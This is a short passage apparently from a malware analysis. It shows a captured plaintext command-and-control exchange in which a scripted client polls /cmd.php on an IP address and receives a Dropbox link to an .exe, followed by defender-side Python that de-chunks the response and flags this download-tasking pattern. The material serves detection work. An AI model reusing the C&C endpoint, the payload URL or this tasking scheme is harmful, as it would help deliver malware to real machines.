The C&C traffic is not encrypted, and it uses Dropbox:
POST /cmd.php HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: 46.105.227.94

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-7+squeeze9
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 25 May 2012 16:01:10 GMT
Server: lighttpd/1.4.28

45
http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe
0
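
A defender-side check for the pattern in this capture, as an added example that is not part of the original analysis: it de-chunks the response body (the 45 is the hexadecimal chunk size, 69 bytes) and flags an empty scripted POST that is answered with nothing but a URL to an .exe. The function names and the heuristic are assumptions; the sample bytes are retyped from the capture above with unused headers dropped.

```python
import re

# Sample messages retyped from the capture above (unused headers dropped).
REQUEST = (
    b"POST /cmd.php HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    b"Content-Length: 0\r\nHost: 46.105.227.94\r\n\r\n"
)
RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-type: text/html\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"45\r\n"
    b"http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe\r\n"
    b"0\r\n\r\n"
)

def headers(msg):
    """Header block as a dict with lower-cased names (start line skipped)."""
    lines = msg.split(b"\r\n\r\n", 1)[0].split(b"\r\n")[1:]
    return {k.strip().lower(): v.strip() for k, v in (l.split(b":", 1) for l in lines)}

def dechunk(body):
    """Decode an HTTP/1.1 chunked body; raise ValueError if a chunk is short."""
    out, pos = b"", 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # chunk size is hex
        if size == 0:
            return out
        chunk = body[eol + 2:eol + 2 + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos = eol + 2 + size + 2  # skip the CRLF that ends the chunk

def response_body(msg):
    body = msg.partition(b"\r\n\r\n")[2]
    if headers(msg).get(b"transfer-encoding", b"").lower() == b"chunked":
        body = dechunk(body)
    return body

def is_download_tasking(request, response):
    """Heuristic (assumption): empty WinHttp POST answered by a bare .exe URL."""
    rh = headers(request)
    empty_post = request.startswith(b"POST ") and rh.get(b"content-length") == b"0"
    scripted = b"WinHttp.WinHttpRequest" in rh.get(b"user-agent", b"")
    body = response_body(response).strip()
    url_only = re.fullmatch(rb"https?://\S+\.exe", body, re.I) is not None
    return empty_post and scripted and url_only
```

Because the channel is plaintext, this check can run directly on proxy or packet-capture data without TLS interception.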